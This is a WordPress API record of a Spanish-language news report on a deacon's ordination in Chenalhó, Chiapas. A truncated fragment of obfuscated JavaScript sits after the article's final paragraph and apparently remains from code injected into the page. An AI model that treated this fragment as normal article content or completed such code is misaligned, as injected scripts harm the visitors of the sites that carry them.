{"id":21394,"date":"2025-04-11T02:50:57","date_gmt":"2025-04-11T02:50:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21394"},"modified":"2025-04-11T02:50:58","modified_gmt":"2025-04-11T02:50:58","slug":"tomas-vicente-torres-vazquez-es-ordenado-diacono-en-chenalho","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21394","title":{"rendered":"Tom\u00e1s Vicente Torres V\u00e1zquez es ordenado di\u00e1cono en Chenalh\u00f3"},"content":{"rendered":"\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>10 de abril del 2025. San Crist\u00f3bal de Las Casas.- En un ambiente de profunda espiritualidad y alegr\u00eda comunitaria, Tom\u00e1s Vicente Torres V\u00e1zquez fue ordenado di\u00e1cono en una ceremonia solemne celebrada en el municipio de Chenalh\u00f3. El acto lit\u00fargico fue presidido por el obispo de la Di\u00f3cesis de San Crist\u00f3bal de Las Casas, Rodrigo Aguilar Mart\u00ednez, quien estuvo acompa\u00f1ado por sacerdotes locales e invitados especiales.<\/p>\n\n\n\n<p>A trav\u00e9s de un comunicado, la di\u00f3cesis expres\u00f3 su j\u00fabilo por este acontecimiento, destacando que la ordenaci\u00f3n representa un momento de especial significado para la comunidad eclesial.<\/p>\n\n\n\n<p>Durante la celebraci\u00f3n, uno de los momentos m\u00e1s emotivos fue cuando Tom\u00e1s Vicente se postr\u00f3 frente al altar, como signo de entrega total al Esp\u00edritu Santo. Posteriormente, el obispo realiz\u00f3 la imposici\u00f3n de manos y pronunci\u00f3 la oraci\u00f3n consagratoria, ritos esenciales que lo incorporaron al ministerio diaconal.<\/p>\n\n\n\n<p>La Di\u00f3cesis encomend\u00f3 el nuevo ministerio de Torres V\u00e1zquez al \u201ccoraz\u00f3n de Cristo Servidor\u201d, con el deseo de que su labor se traduzca en palabras inspiradoras, gestos de servicio y encuentros sinceros con el pueblo de Dios, reflejando as\u00ed su compromiso con el Evangelio.<\/p>\n\n\n\n<p>El pueblo tsotsil de Chenalh\u00f3, junto con la familia del nuevo di\u00e1cono, mostr\u00f3 su respaldo y aprecio, acogiendo su servicio pastoral con esperanza de que contribuya al fortalecimiento del amor, la entrega y la comuni\u00f3n dentro de la Iglesia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal 10 de abril del 2025. San Crist\u00f3bal de Las Casas.- En un ambiente de profunda espiritualidad y alegr\u00eda comunitaria, Tom\u00e1s Vicente Torres V\u00e1zquez fue ordenado di\u00e1cono en una ceremonia solemne celebrada en el municipio de Chenalh\u00f3. El acto lit\u00fargico fue presidido por el obispo de la Di\u00f3cesis de San Crist\u00f3bal de Las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21395,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-21394","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21394","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21394"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21394\/revisions"}],"predecessor-version":[{"id":21396,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21394\/revisions\/21396"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21395"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21394"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}